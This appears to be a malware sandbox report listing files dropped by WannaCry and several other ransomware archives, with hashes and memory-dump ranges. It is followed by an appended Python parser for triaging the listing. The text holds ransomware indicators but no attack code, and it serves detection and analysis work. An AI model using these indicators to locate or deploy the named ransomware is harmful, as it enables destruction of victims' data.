MD567a622c38c1a31ec022312034fef594e
SHA1d9fa393f65c6624437e5660c0f81fe6bd8344989
SHA2560bf481473be919415ab70f4fe54ef0202df9fcc46ad7d1a0e99d55b1dd0350ac
SHA512af5b00047ddeb98767e5e20e4fc1137036f99e6de81945c5f0ae2d87f94144ff33777a711117dd19d5011b47a7d259f785b9576c62956281e7fcd29a1ce5a40e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5b0496b40405b92122d3c2d246a926161
SHA1a24c3f858d4e292899df4d9d174d529af51f9e34
SHA256e53ef21d822dc13c08d90d3b221f5d3091676c4ecc4d93eeffa58967ef91da1a
SHA512c5e5558e87b4626099bfbd2f661035d2c4d38c5f79d4cfd9a5204ed7a9653049e48f268cd56f920b16512ff6e5560902c60152ea8320cbff2d0f63b12a0a804a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD51870f652120827caede2dea93daf9456
SHA16e8c8d440bf1c300c56b9521223400e7a15964fb
SHA256d614457b29439ae66ee0fedc468bc002514ba4539d95de582cf9f439eb9338b5
SHA5129b474e78ce2454e5f9c42ab4003827bc5b004d4d185a813e87f0aa81838fe9a86cab6f1646da75108e48f76229af40b8ae12dcadb6c256bf7f43b7145c58b7f0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5b969c7d3553bde191e667e9c81ef8dcc
SHA15e0f46799934bf463100fafb8190fa8ae86aea1d
SHA25669fc78a2bdee66a945e27223ed3bc146b290a0800afc865bc6841d6be9540a30
SHA512bc0abc7e4e41d1bf0e6dae5711af359d6cd7897b9d37d8ae568e0e5666ef8043313b96cdb76ee57b1f8e5b9e37d9ecb27759061d213b13e2896c48840441ef86
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe581028.TMPFilesize
874B
MD57031b52d0691d0adb24e03f065a98b9e
SHA19bed8d6aec4d1d9015158611c3848dd432a12848
SHA2566440c69d0ff38dc10324b3ab69c405430e79862c6d4a80325492c3c1e06b26c2
SHA51240fed3cbca4e7fbf8ea6ac20b730b0be8de67891cf4669a3c71c31c343fbe2836eb63774d442f897cfd23832d0f9c0c586aee76347917080be847ea98b8343a1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
12KB
MD582da84d65cbc717ff72cebfe6a63ce77
SHA121843387d0cc8f9396b8ce752123a6bdff36f57c
SHA256ace91d03093e6b5ba5698e9b98f1f6d47fbe23589cc053352f208d8ed7b11d95
SHA512c9d2d27f636f0a9cf4856e9884c5e3c82d19c34bff7b4ee7b3f338b290b3e047ac4e25e58f3792bfb1af397695f445b1a175997da2a42a1eb594626965c01bca
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
12KB
MD5ea09b945074a9e9d6e12632320198798
SHA1474e4e8a5e74509103e4685d9e58e76b93542ab9
SHA256c5c54937d3745d69d8aca4bd54203a8a94a790cf871e8379b508be1699b289fe
SHA512b26955dab934b3927b7eb3c4e0fec92c47775d8b0fe0982033be831e676c6be830ff102a3d0b5bec9af945cf4092a1c14924ed02d03d685028f8c34e72609e88
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
12KB
MD580c21aff13d0e091926329842450426f
SHA1d809c7ddbe370a13fef5a2d1c0ef36ad2a74f537
SHA256b095c02c1fdea9f2da1fc744725095cc5511b00f73db23b5cbef9c748ffefc5d
SHA5120f1f0420065e76ea56a65b69fa15361cca7a40af5e76e7b6be6601e5df62ce2980ffbc1effe538b77934a633ec3a073bf529d43dd3461b7e165b5e17d1cc0800
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
12KB
MD502c962e8aeb3a7543392d07cf77a8a8a
SHA1f15644a1bd85733f7207507dbd4468951cbef86b
SHA25619e8452fff51fabca7f93a7235ee14400e2b6bfc2e59732d2452f433f5c347b4
SHA5120939bf697dcb228e86d2671dee9f5a7de2c6dafd6a04fd0b49e607ac641c28965db85ea5ee1c79d29b9f846c1a4460862662d87213c0bc9127449097a3572a1f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
12KB
MD53de6fb71979f4963cfff738f266491d6
SHA1566a65c0c96059c9451c92a4c06fd7f3ae623837
SHA256fc4594f342544b0c58053d5e7cb0563a79613c26d7bd8495a342a4bc7bacb9ef
SHA512514a68750f968ff78267a82458418189645e36f3b723610c24083283f5a81eff84d26263e19a2f94c506a34c72f1783e25b91fdc5f111a7b511acabe0fe1b786
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
12KB
MD5ece578c020e0eec1610d11a3bbd75cd0
SHA1a877cdfbf13adca18f380403517fcac27134193a
SHA25686fe38438396a31defb4b419dcefeeb2dc0beeb36bc859680787a6be363e86ea
SHA512365fcb0429820fbfef7913844d971ee96228f5b6ef4a08926cfa916d250cf9418cab634b9fc6d474221579bcd76eb980f1004ada5c05300949084b2d9e27b34f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
12KB
MD52730b41cedba0850a15d24de736eb330
SHA1380a2497ad16d297278de05a8389f6cda7ba904a
SHA25656e990fa18c0bc4d2fc44e9804a7ea6f6fbe58794273dd79faa658b4bdce8800
SHA51216ba9bfa9655821e7673c827d330d834cb8a0f6fa88982f5227672cfff20f789b7c6b03c2df5c8fb4da47309b45ad2a2583b7f447a90916691bc2bceeaceb1ae
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\f76ffd0a-4a10-44d4-b93d-1008596924e5.tmpFilesize
11KB
MD52f6d0e4218e3af10b202186a5ffbccba
SHA13d418568e9db79a38e3e5a95b22a1e88f3b03ac2
SHA256a0b35bedba490917b7befb2d1992ddc6a2b4e7046f806b98e1f4a6056ec68a86
SHA51241625fbf4ca8147dd9bfb13b67b325d2522a775a62971556509232d6108946f107a132b3a71de7f822a3018a37c34639fb2fe7fb29c8a2c6da2d45d35caa2c74
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]Filesize
933B
MD5f97d2e6f8d820dbd3b66f21137de4f09
SHA1596799b75b5d60aa9cd45646f68e9c0bd06df252
SHA2560e5ece918132a2b1a190906e74becb8e4ced36eec9f9d1c70f5da72ac4c6b92a
SHA512efda21d83464a6a32fdeef93152ffd32a648130754fdd3635f7ff61cc1664f7fc050900f0f871b0ddd3a3846222bf62ab5df8eed42610a76be66fff5f7b4c4c0
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]Filesize
240KB
MD57bf2b57f2a205768755c07f238fb32cc
SHA145356a9dd616ed7161a3b9192e2f318d0ab5ad10
SHA256b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
SHA51291a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\tor.exeFilesize
3.0MB
MD5fe7eb54691ad6e6af77f8a9a0b6de26d
SHA153912d33bec3375153b7e4e68b78d66dab62671a
SHA256e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb
SHA5128ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\b.wnryFilesize
1.4MB
MD5c17170262312f3be7027bc2ca825bf0c
SHA1f19eceda82973239a1fdc5826bce7691e5dcb4fb
SHA256d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa
SHA512c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\c.wnryFilesize
780B
MD5383a85eab6ecda319bfddd82416fc6c2
SHA12a9324e1d02c3e41582bf5370043d8afeb02ba6f
SHA256079ce1041cbffe18ff62a2b4a33711eda40f680d0b1d3b551db47e39a6390b21
SHA512c661e0b3c175d31b365362e52d7b152267a15d59517a4bcc493329be20b23d0e4eb62d1ba80bb96447eeaf91a6901f4b34bf173b4ab6f90d4111ea97c87c1252
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_bulgarian.wnryFilesize
46KB
MD595673b0f968c0f55b32204361940d184
SHA181e427d15a1a826b93e91c3d2fa65221c8ca9cff
SHA25640b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd
SHA5127601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_chinese (simplified).wnryFilesize
53KB
MD50252d45ca21c8e43c9742285c48e91ad
SHA15c14551d2736eef3a1c1970cc492206e531703c1
SHA256845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a
SHA5121bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_chinese (traditional).wnryFilesize
77KB
MD52efc3690d67cd073a9406a25005f7cea
SHA152c07f98870eabace6ec370b7eb562751e8067e9
SHA2565c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a
SHA5120766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_croatian.wnryFilesize
38KB
MD517194003fa70ce477326ce2f6deeb270
SHA1e325988f68d327743926ea317abb9882f347fa73
SHA2563f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171
SHA512dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_czech.wnryFilesize
39KB
MD5537efeecdfa94cc421e58fd82a58ba9e
SHA13609456e16bc16ba447979f3aa69221290ec17d0
SHA2565afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150
SHA512e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_danish.wnryFilesize
36KB
MD52c5a3b81d5c4715b7bea01033367fcb5
SHA1b548b45da8463e17199daafd34c23591f94e82cd
SHA256a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6
SHA512490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_dutch.wnryFilesize
36KB
MD57a8d499407c6a647c03c4471a67eaad7
SHA1d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b
SHA2562c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c
SHA512608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_english.wnryFilesize
36KB
MD5fe68c2dc0d2419b38f44d83f2fcf232e
SHA16c6e49949957215aa2f3dfb72207d249adf36283
SHA25626fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5
SHA512941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_filipino.wnryFilesize
36KB
MD508b9e69b57e4c9b966664f8e1c27ab09
SHA12da1025bbbfb3cd308070765fc0893a48e5a85fa
SHA256d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324
SHA512966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_finnish.wnryFilesize
37KB
MD535c2f97eea8819b1caebd23fee732d8f
SHA1e354d1cc43d6a39d9732adea5d3b0f57284255d2
SHA2561adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e
SHA512908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_french.wnryFilesize
37KB
MD54e57113a6bf6b88fdd32782a4a381274
SHA10fccbc91f0f94453d91670c6794f71348711061d
SHA2569bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc
SHA5124f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_german.wnryFilesize
36KB
MD53d59bbb5553fe03a89f817819540f469
SHA126781d4b06ff704800b463d0f1fca3afd923a9fe
SHA2562adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61
SHA51295719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jicjixf2.xr4.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.newFilesize
5.6MB
MD5820a523dff19ae8cb4b7f61fe7f3a9fe
SHA12a7e6eed710c51b41686ebc24244d6915c1babd7
SHA256c091fb84febfac661b0172defee50710e0c122b7f456d989cba45525b7c68f4d
SHA51217f517e6391920a5a84de5bb3bdd86ce86e1a85474426c910b22a8d95344fec5658a6286ce7a88b32019424c33de454b68133a4f2a6dc39dfd6d1ba2ea656718
-
C:\Users\Admin\Downloads\Ransomware.Cerber.zipFilesize
215KB
MD55c571c69dd75c30f95fe280ca6c624e9
SHA1b0610fc5d35478c4b95c450b66d2305155776b56
SHA256416774bf62d9612d11d561d7e13203a3cbc352382a8e382ade3332e3077e096c
SHA5128e7b9a4a514506d9b8e0f50cc521f82b5816d4d9c27da65e4245e925ec74ac8f93f8fe006acbab5fcfd4970573b11d7ea049cc79fb14ad12a3ab6383a1c200b2
-
C:\Users\Admin\Downloads\Ransomware.Jigsaw.zipFilesize
239KB
MD53ad6374a3558149d09d74e6af72344e3
SHA1e7be9f22578027fc0b6ddb94c09b245ee8ce1620
SHA25686a391fe7a237f4f17846c53d71e45820411d1a9a6e0c16f22a11ebc491ff9ff
SHA51221c21b36be200a195bfa648e228c64e52262b06d19d294446b8a544ff1d81f81eb2af74ddbdebc59915168db5dba76d0f0585e83471801d9ee37e59af0620720
-
C:\Users\Admin\Downloads\Ransomware.Petrwrap.zipFilesize
1.1MB
MD56884a35803f2e795fa4b121f636332b4
SHA1527bfbf4436f9cce804152200c4808365e6ba8f9
SHA256cf01329c0463865422caa595de325e5fe3f7fba44aabebaae11a6adfeb78b91c
SHA512262732a9203e2f3593d45a9b26a1a03cc185a20cf28fad3505e257b960664983d2e4f2b19b9ff743015310bf593810bd049eb03d0fd8912a6d54de739742de60
-
C:\Users\Admin\Downloads\Ransomware.Petya.zipFilesize
538KB
MD5e8fb95ebb7e0db4c68a32947a74b5ff9
SHA16f93f85342aa3ea7dcbe69cfb55d48e5027b296c
SHA25633ca487a65d38bad82dccfa0d076bad071466e4183562d0b1ad1a2e954667fe9
SHA512a2dea77b0283f4ed987c4de8860a9822bfd030be9c3096cda54f6159a89d461099e58efbc767bb8c04ae21ddd4289da578f8d938d78f30d40f9bca6567087320
-
C:\Users\Admin\Downloads\Ransomware.Thanos.zipFilesize
145KB
MD500184463f3b071369d60353c692be6f0
SHA1d3c1e90f39da2997ef4888b54d706b1a1fde642a
SHA256cd0f55dd00111251cd580c7e7cc1d17448faf27e4ef39818d75ce330628c7787
SHA512: baa931a23ecbcb15dda6a1dc46d65fd74b46ccea8891c48f0822a8a10092b7d4f7ea1dc971946a161ac861f0aa8b99362d5bea960b47b10f8c91e33d1b018006
-
C:\Users\Admin\Downloads\Ransomware.Thanos.zip:Zone.Identifier
Filesize: 55B
MD5: 0f98a5550abe0fb880568b1480c96a1c
SHA1: d2ce9f7057b201d31f79f3aee2225d89f36be07d
SHA256: 2dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1
SHA512: dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6
-
C:\Users\Admin\Downloads\Ransomware.Vipasana.zip
Filesize: 638KB
MD5: 8d2c4c192772985776bacfd77f7bc4d9
SHA1: 3b923b911d443e321e551f26c9588b16a994d52e
SHA256: 1733b199a7063443c167e3caeae7dda2315f590341ea2152a9b132e1ad8e94a8
SHA512: 6c24f2fe498cf38e3f3d66b62915e6fbc8c2746a1d4c3c3de270f994b02e1369b9540099c12d150712574ececbe63c8c9f28877d8aa4557fbbb7890d5a0de6c1
-
C:\Users\Admin\Downloads\Ransomware.WannaCry.zip
Filesize: 3.3MB
MD5: efe76bf09daba2c594d2bc173d9b5cf0
SHA1: ba5de52939cb809eae10fdbb7fac47095a9599a7
SHA256: 707a9f323556179571bc832e34fa592066b1d5f2cac4a7426fe163597e3e618a
SHA512: 4a1df71925cf2eb49c38f07c6a95bea17752b025f0114c6fd81bc0841c1d1f2965b5dda1469e454b9e8207c2e0dfd3df0959e57166620ccff86eeeb5cf855029
-
C:\Users\Admin\Downloads\Ransomware.WannaCry.zip:Zone.Identifier
Filesize: 26B
MD5: fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1: d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256: eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512: aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98
-
C:\Users\Admin\Downloads\Ransomware.WannaCry_Plus.zip
Filesize: 2.3MB
MD5: 5641d280a62b66943bf2d05a72a972c7
SHA1: c857f1162c316a25eeff6116e249a97b59538585
SHA256: ab14c3f5741c06ad40632447b2fc10662d151afb32066a507aab4ec866ffd488
SHA512: 0633bc32fa6d31b4c6f04171002ad5da6bb83571b9766e5c8d81002037b4bc96e86eb059d35cf5ce17a1a75767461ba5ac0a89267c3d0e5ce165719ca2af1752
-
\??\pipe\LOCAL\crashpad_2800_IANURAIYPWGKAIDP
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/2924-622-0x00000000062E0000-0x000000000632C000-memory.dmp
Filesize: 304KB
-
memory/2924-620-0x0000000005DF0000-0x0000000006147000-memory.dmp
Filesize: 3.3MB
-
memory/2924-609-0x0000000005510000-0x0000000005532000-memory.dmp
Filesize: 136KB
-
memory/2924-607-0x0000000002A80000-0x0000000002AB6000-memory.dmp
Filesize: 216KB
-
memory/2924-608-0x00000000056E0000-0x0000000005D0A000-memory.dmp
Filesize: 6.2MB
-
memory/2924-611-0x0000000005D80000-0x0000000005DE6000-memory.dmp
Filesize: 408KB
-
memory/2924-633-0x00000000067C0000-0x00000000067DA000-memory.dmp
Filesize: 104KB
-
memory/2924-632-0x0000000007B00000-0x000000000817A000-memory.dmp
Filesize: 6.5MB
-
memory/2924-610-0x0000000005D10000-0x0000000005D76000-memory.dmp
Filesize: 408KB
-
memory/2924-621-0x00000000062A0000-0x00000000062BE000-memory.dmp
Filesize: 120KB
-
memory/3124-640-0x000000001E2F0000-0x000000001E342000-memory.dmp
Filesize: 328KB
-
memory/3124-636-0x000000001D5D0000-0x000000001DA9E000-memory.dmp
Filesize: 4.8MB
-
memory/3124-637-0x000000001DB40000-0x000000001DBDC000-memory.dmp
Filesize: 624KB
-
memory/3124-638-0x000000001DC50000-0x000000001DCB2000-memory.dmp
Filesize: 392KB
-
memory/3124-639-0x000000001BF70000-0x000000001BF78000-memory.dmp
Filesize: 32KB
-
memory/3492-2216-0x0000000071380000-0x0000000071402000-memory.dmp
Filesize: 520KB
-
memory/3492-2255-0x0000000000090000-0x000000000038E000-memory.dmp
Filesize: 3.0MB
-
memory/3492-2217-0x0000000071130000-0x0000000071152000-memory.dmp
Filesize: 136KB
-
memory/3492-2218-0x0000000000090000-0x000000000038E000-memory.dmp
Filesize: 3.0MB
-
memory/3492-2215-0x0000000071160000-0x000000007137C000-memory.dmp
Filesize: 2.1MB
-
memory/3492-2256-0x0000000071410000-0x0000000071492000-memory.dmp
Filesize: 520KB
-
memory/3492-2261-0x00000000710B0000-0x0000000071127000-memory.dmp
Filesize: 476KB
-
memory/3492-2260-0x00000000714A0000-0x00000000714BC000-memory.dmp
Filesize: 112KB
-
memory/3492-2259-0x0000000071380000-0x0000000071402000-memory.dmp
Filesize: 520KB
-
memory/3492-2258-0x0000000071160000-0x000000007137C000-memory.dmp
Filesize: 2.1MB
-
memory/3492-2257-0x0000000071130000-0x0000000071152000-memory.dmp
Filesize: 136KB
-
memory/3492-2214-0x0000000071410000-0x0000000071492000-memory.dmp
Filesize: 520KB
-
memory/3492-2265-0x0000000000090000-0x000000000038E000-memory.dmp
Filesize: 3.0MB
-
memory/3492-2272-0x0000000000090000-0x000000000038E000-memory.dmp
Filesize: 3.0MB
-
memory/3492-2294-0x0000000071160000-0x000000007137C000-memory.dmp
Filesize: 2.1MB
-
memory/3492-2291-0x0000000000090000-0x000000000038E000-memory.dmp
Filesize: 3.0MB
-
memory/3492-2329-0x0000000000090000-0x000000000038E000-memory.dmp
Filesize: 3.0MB
-
memory/3492-2338-0x0000000000090000-0x000000000038E000-memory.dmp
Filesize: 3.0MB
-
memory/3492-2341-0x0000000071160000-0x000000007137C000-memory.dmp
Filesize: 2.1MB
-
memory/3492-2349-0x0000000071160000-0x000000007137C000-memory.dmp
Filesize: 2.1MB
-
memory/3492-2346-0x0000000000090000-0x000000000038E000-memory.dmp
Filesize: 3.0MB
-
memory/3492-2354-0x0000000000090000-0x000000000038E000-memory.dmp
Filesize: 3.0MB
-
memory/3492-2357-0x0000000071160000-0x000000007137C000-memory.dmp
Filesize: 2.1MB
-
memory/4616-786-0x0000000010000000-0x0000000010010000-memory.dmp
Filesize: 64KB
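The artifact listing above, worked through in code. This is an added example and not part of the report or of the sandbox's own tooling: a Python parser for the flattened entries as they appear here (a path fused with "Filesize", the MD5/SHA1/SHA256/SHA512 labels fused with their hex digests, and a "-" line between entries). Two checks a triager would want are built in. First, the crashpad named-pipe entry carries the digests of a zero-length input (d41d8cd9…, da39a3ee…, e3b0c442… and cf83e135… are the MD5, SHA-1, SHA-256 and SHA-512 of empty input), so nothing was actually hashed there; the same table of candidate contents also tries the standard Mark-of-the-Web stream body (ZoneId=3) against the tiny Zone.Identifier entries. Second, each memory dump's listed size is compared with the byte span of its address range, allowing half of the last displayed digit as rounding slack. The sample input is copied from three of the entries above; the names Artifact, parse_listing, parse_size, region_size, identify_content and check_artifact, the KNOWN_CONTENT candidates and the tolerance rule are this example's own assumptions.

```python
import hashlib
import re
from dataclasses import dataclass, field

# Added example, not the sandbox's own tooling: parse the flattened artifact listing.
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
SIZE_UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2}
LABEL_RE = re.compile(r"(MD5|SHA1|SHA256|SHA512)([0-9a-fA-F]*)")
SIZE_RE = re.compile(r"(\d+(?:\.\d+)?)(B|KB|MB)")
MEM_RE = re.compile(r"memory/\d+-\d+-0x([0-9a-fA-F]+)-0x([0-9a-fA-F]+)-memory\.dmp")
# Assumed candidates for tiny artifacts (second is the standard Mark-of-the-Web body, ZoneId=3).
KNOWN_CONTENT = {
    b"": "empty input (nothing was actually hashed)",
    b"[ZoneTransfer]\r\nZoneId=3\r\n": "Zone.Identifier stream with ZoneId=3",
}
# Three entries copied from the listing on this page, in its flattened form.
SAMPLE = r"""C:\Users\Admin\Downloads\Ransomware.WannaCry.zip:Zone.IdentifierFilesize
26B
MD5fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98
-
\??\pipe\LOCAL\crashpad_2800_IANURAIYPWGKAIDPMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/2924-622-0x00000000062E0000-0x000000000632C000-memory.dmpFilesize
304KB
-
"""

@dataclass
class Artifact:
    name: str
    size: str = None  # as listed ("26B", "3.0MB"); None for the pipe entry
    hashes: dict = field(default_factory=dict)

def _parse_entry(lines):
    head, rest = lines[0], lines[1:]
    if head.endswith("Filesize"):
        art = Artifact(head[: -len("Filesize")], rest.pop(0) if rest else None)
    else:  # size-less entries (the crashpad pipe) fuse the first hash label to the name
        m = re.search(r"(MD5|SHA1|SHA256|SHA512)$", head)
        art = Artifact(head[: m.start()] if m else head)
        if m and rest:
            rest[0] = m.group(1) + rest[0]
    for line in rest:
        m = LABEL_RE.fullmatch(line)
        if m:
            art.hashes[m.group(1)] = m.group(2).lower()
    return art

def parse_listing(text):
    """Split the listing on '-' separator lines and unfuse labels from values."""
    artifacts, block = [], []
    for line in text.splitlines() + ["-"]:
        line = line.strip()
        if line == "-" and block:
            artifacts.append(_parse_entry(block))
            block = []
        elif line and line != "-":
            block.append(line)
    return artifacts

def parse_size(text):
    """'3.0MB' -> (bytes, tolerance), tolerance being half the last shown digit."""
    m = SIZE_RE.fullmatch(text)
    if not m:
        return None
    number, unit = m.groups()
    decimals = len(number.split(".")[1]) if "." in number else 0
    return float(number) * SIZE_UNITS[unit], SIZE_UNITS[unit] * 10 ** -decimals / 2

def region_size(name):
    """Bytes spanned by a memory dump's address range, or None for other names."""
    m = MEM_RE.fullmatch(name)
    return int(m.group(2), 16) - int(m.group(1), 16) if m else None

def identify_content(art):
    """Label an artifact whose listed digests all match one KNOWN_CONTENT candidate."""
    for content, label in KNOWN_CONTENT.items():
        if art.hashes and all(hashlib.new(algo.lower(), content).hexdigest() == digest
                              for algo, digest in art.hashes.items()):
            return label
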